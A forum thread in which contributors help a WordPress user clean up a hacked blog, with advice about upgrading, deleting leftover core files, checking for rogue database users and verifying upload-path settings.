Spammed/hacked???

>I upgraded to the newer wordpress versions today

Reading old posts, those users whose WP blogs have been cracked suggest that upgrading WP to the latest doesn’t necessarily stop the evil from cracking them again.

You may want to destroy all administrative usernames and create a new one, giving it a nickname like ‘admin’ and changing admin display name to the nickname.

Check to see if the malicious code isn’t in any theme file. Upgrading doesn’t help if you keep infected files.

Well, I don’t have the experience (fortunately!), but when you search the forums a bit, you’ll find that in many cases some flaw is used to inject the theme with spamlinks. My advice is to get a “fresh copy” of the theme AND of the whole WP pack and of course change ALL passwords (and the username of the admin if you think they might have the passwords). Also make sure you don’t use a version of WP, a theme or a plugin that is vulnerable and perhaps you want to have a look to see if there are no strange table in the database or files anywhere on your server (maybe even outside of the WP folder if you have more).

When all is back up, have a good look at this article and follow the tips.

I’m using the WordPress Default theme, so if it’s flawed, WP have an issue, IMO.

emphasis mine.

In your opinion? thats crap. google’s cache of your site as of less than a week ago shows you were running 2.1.3

http://74.125.95.104/search?q=cache:D3JDTW-aMboJ:www.skolaiimages.com/journal/+http://skolaiimages.com/journal/&hl=en&ct=clnk&cd=1&gl=us

<meta name="generator" content="WordPress 2.1.3" /> <!-- leave this for stats -->

You have been running an exploitable version of wordpress for well over a year, and while you indicated above that you were exploited a month ago, you admittedly continued to use that version?

There’s the real flaw.

For starters, I apologize, I misread what I quoted. I missed the “if”.

Here’s the deal though, upgrading was a very wise move, no doubt. I can tell you, from experience, that that isnt the end of the process though.

Having cleaned out a number of previously exploited wordpress installs, it;s important to take a hard look at what files are on your site. Typically, people do this when they upgrade:

they grab the zip, they unpack the files, and they upload those new files, right on top of the content thats already there. That overwrites the wordpress files, sure — BUT, if there is a script that has been “hidden” inside, for instance, one the many directories inside wp-includes/ that script is still there.

When I clean out an exploited site, (and they typically need upgrades), I delete EVERYTHING except for the specific items mentioned in the codex (wp-config.php, etc..) before uploading the new wp files. That way, anything malicious is deleted.

Its also important to insure that you dont have any rogue users in your db, especially one named wordpress. You will NOT see that in your users list; you actually have to look in the database.

Also, take a look at this link /wp-admin/options.php (on your own site).

there are 2 values for an upload directory. Make sure neither of them point to anything like this ../../../tmp or anything similar.

As for theme issues, VERY early version of kubrick had one security issue, related to the search box code. Thats been fixed in later versions.

Hope that helps.

Hi Carl,

Here’s what worries me most about your last post:

In the wp-admin folder, I have 4 files starting with ‘upload’

upload-functions.php —- 3/17/2007
upload-js.php ———- 1/18/2007
upload-rtl.css ———- 11/14/2006
upload.css ————- 1/09/2007
upload.php ————- 10/22/2008

see those old timestamps? that suggests that your last upgrade was done the way I previously described. 🙁

On a clean site, just overwriting files is marginally okay. I say that because one section of the codex indicates thats “okay”. Fwiw, I can find another upgrade page on the codex that explicitly says to delete files first.

My point is that you should not have, and especially in the case of a site thats been exploited, files with old timestamps, except in the case of wp-config.php, themes, and plugins.

The only exception to that would be if you used wget/fetch and upgraded all the files via the the command line, in which case the timestamps inside the zip/tar would be preserved.

if you look at the 2.1.x files, these 4 files :

upload-functions.php —- 3/17/2007
upload-js.php ———- 1/18/2007
upload-rtl.css ———- 11/14/2006
upload.css ————- 1/09/2007

are all leftovers from your old install. In fact, you can confirm this by looking at a 2.6.2 zip -==- 2.6.2 doesnt have the files inside wp-admin anymore

If this were MY site, I would systematically delete all the files in the core directories, except for your current theme, your plugins, and your wp-config.php, and then I would upload ALL fresh files. I would do this for the reason I already explained in my last post.

Should I just go thru and delete all the files in those directories that are not dated 10-22-08

you can do that, yes. where you might have trouble with that is inside wp-includes/js

Again, were it me, I would delete everything in there, use an ftp client, and manually upload the files that belong there.

Ive stressed wp-includes/ several times now, because its turned out to be, more than once, the location of choice for rootshell scripts (malicious files), in sites that Ive personally “de”-hacked.

and yes, by core directories, I mean just what you said 🙂

but just upload all the core files manually?

just upload the 2 files 🙂 — even easier.